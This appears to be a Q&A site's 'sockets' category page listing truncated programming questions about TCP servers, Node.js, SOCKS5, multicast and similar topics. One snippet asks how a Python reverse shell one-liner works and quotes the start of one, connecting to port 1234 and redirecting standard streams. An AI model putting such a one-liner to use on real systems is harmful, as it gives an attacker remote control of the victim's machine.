Category "sockets"

How to handle keep alive received probe on python server

In a python-written server with TCP socket defined as follows: def create_tcp_socket(bind_address): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

How to read each char sent by Putty at Java server?

After forcing off the "Local line editing" at Putty (Raw mode), all chars typed are sent to the server without the Enter (checked it with Wireshark). I have thi

linux socket lose data when a delay is added before read

I am learning linux socket programming, I expect that server can read data, even I add a delay but it just drops the buffer data, and receive the recent data, t

Removing video of the early joined user from the latter joined users's screen when the early joined user left the video in

I am trying to implement the video call functionality in socket io. The issue is that wheneverthe previously joined user lefts the call, his video is not remove

Nodejs Game using too much cpu/ram

I am making a Nodejs Multiplayer game. PROBLEM: After a period of time, around a few seconds, the latency between the server to client skyrockets. Not just a li

Image Processing in Python from Unity Hololens Development

So I have an image processing algorithm doing crack detection written in Python and I want to have this work on the Hololens (in Unity). I don't have any experi

Python Port Scanner, User Input

Working on a simple port scanner that allows user to input an IP address as well as a set of ports to scan through ie a lower boundary port and an upper boundar

How do I avoid open sockets using libevent evhttp client?

I have a fairly simple http client using libevent's evhttp functions. It works almost perfectly, but it eventually fails with 'too many open files'. The client

How to use a proxy list with socket in python to ping a ip?

I am using python and socket, I want to use a proxy list, but I am not estbalishing a http connection(Or am I??), but I am using it to ping a ip, I would like t

How does a Python reverse shell one-liner work?

Consider: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(

CPP program background waiting for jobs

I want to split up the following workflow of a C++ program: Read serialized data (1 sec, which is already very fast for that size) Search data (0.01 ms) Return

What happens when a socket client and server both send() simultaneously?

I'm trying to learn about sockets, and most simple examples online have either the client or server doing most of the send()'ing and the other doing most of the

problem in connecting two device through socket programming in python

I'm trying to send a simple message from my mobile to my laptop through socket programming in python. I'm using win 10 and python 3.7.4 on my laptop. I am also

Where to close a member variable (e.g.:socket) in a java class?

In my case, the member variable is socket. But this question can be general for any member variable which needs some operations before the object is deleted. I

Is it possible to stream a video from client side to nodejs server and save it to a mp4 file?

hello everyone thanks for reading this , is it possible to send video stream from client side to nodejs server then save it to a file each time there is a new c

Postman : socket hang up

I just started using Postman. I had this error "Error: socket hang up" when I was executing a collection runner. I've read a few post regarding socket hang up a

JS file gets a net::ERR_ABORTED 404 (Not Found)

I am trying to create a simple Io-web-chat. I recently wanted to seperate my <script> inside my html file to an external js file. this is my very simple

Accepting/Sending messages to one Client Simultaneously

Till now I have a Server, Client1 and a Client2. The code works all fine and you can send messages between each Clients. The output looks something like this (b

Why socks5 UDP association terminates when the TCP connection that the UDP ASSOCIATE request arrived on terminates?

As socks5 rfc says, A UDP association terminates when the TCP connection that the UDP ASSOCIATE request arrived on terminates. I wonder, doesn't "the TCP conn

python multicast: how to disable IP_MULTICAST_LOOP

Trying this code: import socket mcast_group = "" mcast_port = 4444 sock_rx = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock_rx.setsockopt(sock